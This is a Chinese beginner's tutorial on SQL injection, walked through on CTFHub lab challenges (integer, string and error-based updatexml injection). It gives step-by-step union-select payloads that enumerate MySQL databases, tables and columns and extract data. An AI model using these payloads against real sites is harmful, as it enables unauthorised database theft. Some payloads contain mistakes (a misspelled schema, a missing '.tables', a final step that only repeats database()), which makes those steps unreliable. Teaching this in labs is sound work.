如果你一开始跟我一样也是一名小白,也想要入门sql注入,那你就先得了解基础的sql注入语言这是预备知识,后面我将会以ctfhub中的题目来向你来介绍与分析的。如果有什么理解错的地方,或者你有更好的理解欢迎在评论区来反馈。谢谢!!!
预备知识
预备知识我将以表格的形式来呈现,还请各位仔细看啊。
| 语句 | 含义 |
|---|---|
| union select | 联合查询,联合注入 |
| database() | 回显当前的数据库 |
| version() | 查看当前sql的版本如:mysql 1.2.3 |
| group_concat() | 把产生的同一分组中的值用某个符号连接起来 如concat("")则不同的分组是用""连接起来的 |
| information_schema | 存储了很多信息的数据库 |
| information_schema.scemata | 所有的数据库信息 |
| information_schema.tables | 表示数据库中存的所有的表 |
| table_name | 表的名字 |
| information_schema.columns | 表示表中的所有列 |
| column_name | 表中列的名 |
| right(str,num) | 表示字符串从右开始截取num个字符(str是字符串的意思) |
| left(str,num) | 方向与上的相反,作用相同 |
| substr(str,N,M) | 表示字符串,从N个字符开始,截取M个字符 |
注入的过程就像是先找库,再找库中的表,再在表中找列,最后进入到列中获得数据。(个人理解,如果有误务必马上指出)
sql注入之整数型注入
一.判断是否存在注入——对于整数型注入
1.输入:1'(1+单引号)
结果:程序出现错误
2.输入:1 and 1=1
结果:程序恢复正常,与刚开始输入1的页面相同
3.输入:1 and 1=2
结果:程序出现错误
如果满足以上的三点说明该URL存在整数型注入
二.查询字段数量(这里是从大到小)
1.输入:1 order by 2
结果:与id=1时的页面相同
2.输入:1 order by 3
结果:程序出现错误
3.得出结果字段数为2位
三.查询SQL语句可以插入的位置
1.输入:-1 union select 1,2
结果:显示Data:2(说明2处可以注入SQL语句)
注释:“-1”是数据库中不存在的数,可以保证之前的数据查不出来,用union select 1,2(联合查询)对id=1和2进行查询查看哪个id可以插入sql语句
四.获取当前数据库的库名
1.输入:-1 union select 1,database()
结果:data:sqli 表示2中的数据库的名字为“sqli”
注释:将2的位置改为database() 是在2中查询其数据库的名字
五.获取该数据库中的表名
方法一(一次获取其中的一个表名)
1.输入:-1 union select 1,(select table_name from information_schema where table_schema='sqli' limit 0,1)
结果:Data:news
2.输入:-1 union select 1,(select table_name from information_schema where table_schema='sqli' limit 1,1)
结果:Data:flag
注释:只要将"limit 0,1"的第一个数字改变即可一个表一个表的查询
方法二(一次性获取所有数据库中的表名)
1.输入:-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
结果:Data:news,flag
六.获取字段名(相当于查看’'flag’表中的文件)
方法一(一次获取一个字段)
1.输入:-1 union select 1,(select column_name from information_schema.columns where table_schema='sqli' and table_name='flag' limit 0,1)
结果:Data:flag
注释:进行下一步的查询同第五步的方法一
方法二(一次性获取所有的片段)
1.输入:-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'
结果:Data:flag
七.获取数据(获取其中名为’flag’表的数据)
方法一(一次获取其中的一条数据)
1.输入:-1 union select 1,(select flag from sqli.flag limit 0,1)
结果:就是flag了
注释:查询下一条数据的操作同上述的方法一
方法二(一次性获取flag中的所有数据)
1.输入:-1 union select 1,group_concat(flag) from sqli.flag
结果:就是flag了
sql注入之字符型注入
做题前你要明白的:在字符型注入中,必须注意字符串闭合的问题。所以需要在 1 后面加入单引号 ’ – '是注释符两个减号加空格,空格一定不能丢。
一.判断是否存在注入
1.输入:1'
结果:程序报错
2.输入:1' and 1=1 -- '
结果:Data:ctfhub
3.输入:1' and 1=2 -- '
结果:程序错误
如果满足以上三点,则可以判断该URL为字符型注入。
二.判断select语句中有几列
1.输入:1' order by 3 -- '
结果:错误
2.输入:1' order by 2 -- '
结果:正确
注释:因此select语句有2列
三.查找可以插入sql语句的列
1.输入:$name=' union select 1,2 -- '
结果:Data:2
注释:sql语句可以插入到第二列中,$name= 相当于整数型的 -1 用来保证之前的数不显示出来
四.利用函数来收集数据库的信息(用户、数据库名、版本…)
1.输入:$name=' union select 1,user() -- '
结果:Data:root@localhost
注释:因为是root用户所以可以访问information_schema数据库
2.输入:$name=' union select 1,database() -- '
结果:Data:sqli
注释:当前数据库的名字为sqli
函数库:
用户:user()
当前函数库:database()
数据库版本:version()
@@hostname:(用户)
@@datadir:数据库在文件的位置
@@version:版本
五.通过union查询数据库
1.输入:$name=' union select 1,group_concat(schema_name) from information_schema.schemata -- '
结果:Data:information_schema,mysql,performance_schema,sqli
注释:获取所有数据库的名字
2.输入:$name=' union select table_schema,count(*) from informationn_schema.tables -- '
结果:Data:161
注释:查询表中有多少个表
3.输入:$name=' union select table_schema,group_concat(table_name) from information_schema.tables where table_schema='sqli' -- '
结果:Data:new、flag
注释:查看sqli数据库中的表名(个人认为上述两步可以跳过)
4.输入:$name=' union select 1,(select column_name from information_schema.columns where table_schema='sqli' and table_name='flag' limit 0,1) -- '
结果:Data:flag
注释:查询有多少个flag的列字段,且该方法为依次查询,进行第二次查询只需要将limit 0,1 改为 limit 1,1 即可
五.查询指定数据库表中列的内容
1.输入:$name=' union select 1,database() -- '
结果:flag答案
sql注入之报错注入
与前面的整数型、字符型不同的是当你输入1的时候你就知道这是个报错注入,所以它的注入语句的格式是有所区别的,我们需要利用到updatexml()函数,首先我来介绍一下updatexml函数
UPDATEXML (XML_document, XPath_string, new_value);——简单来说就是updatexml(文档对象,concat(0x7e,查询语句,0x7e));
第一个参数:XML_document是String格式,为XML文档对象的名称。
第二个参数:XPath_string (Xpath格式的字符串) 。
第三个参数:new_value,String格式,替换查找到的符合条件的数据
由于updatexml的第二个参数需要Xpath格式的字符串,以开头的内容不是xml格式的语法所以这里要用0x7e来代替“”,concat()函数为字符串连接函数显然不符合规则,但是会将括号内的执行结果以错误的形式报出,这样就可以实现报错注入了。
一.判断
1.输入:1
结果:查询正确
2.输入:1'
结果:查询错误
二.使用updatexml函数来进行报错注入
1.输入:1 union select updatexml(1,concat(0x7e,database(),0x7e),1);
结果:得到数据库名
注释:为什么这里是1??
三.进入数据库查看表明
1.输入:1 union select updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema="sqli"),0x7e),1);
结果:出现 new、flag
四.查看flag表中的列
1.输入:1 union select updatexml(1,concat(0x7e,(select(group_concat(column_name))from information_schema.columns where table_schema="sqli" and table_name="flag"),0x7e),1);
结果:出现flag
五.查看flag
1.输入:1 union select updatexml(1,concat(0x7e,(select(group_concat(flag))from sqli.flag),0x7e),1);
结果:只出现 部分flag答案
注释:这里是回显的问题所以我们需要用到right or left 函数
六.使用right函数使flag完全回显
1.输入:1 union select updatexml(1,concat(0x7e,right((select(group_concat(flag))from sqli.flag),50),0x7e),1);
结果:flag答案
注释:这里要掌握好right函数的用法,需要自己灵活变通,我相信你可以 的。
从零开始更多的是需要耐心与不断的尝试,你信不信博主第一题弄了3~4个小时,但是到后面慢慢地有了方向与感觉,后面的两道题花费的时间一次比一次短,我相信你也可以滴。
1724
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
